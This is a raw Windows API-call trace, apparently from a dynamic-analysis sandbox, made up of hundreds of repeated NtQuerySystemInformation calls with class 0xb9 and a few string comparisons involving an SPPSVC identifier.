NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x20, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x20, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x20, ResultLength=0x0) [0184.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff310, Length=0x28, ResultLength=0x0) [0184.620] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff160, Length=0x28, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x28, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x28, ResultLength=0x0) [0184.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x20, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x20, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x20, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0d0, Length=0x20, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x28, ResultLength=0x0) [0184.630] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x28, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x28, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x28, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x20, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x20, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2b0, Length=0x28, ResultLength=0x0) [0184.639] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff330, Length=0x50, ResultLength=0x0) [0184.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff090, Length=0x28, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x28, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x28, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff180, Length=0x28, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x20, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff060, Length=0x20, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x38, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x20, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x20, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x50, ResultLength=0x0) [0185.078] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x50, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.079] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe8c0, Length=0x28, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe930, Length=0x28, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea90, Length=0x38, ResultLength=0x0) [0185.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe9b0, Length=0x28, ResultLength=0x0) [0185.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.083] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.084] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 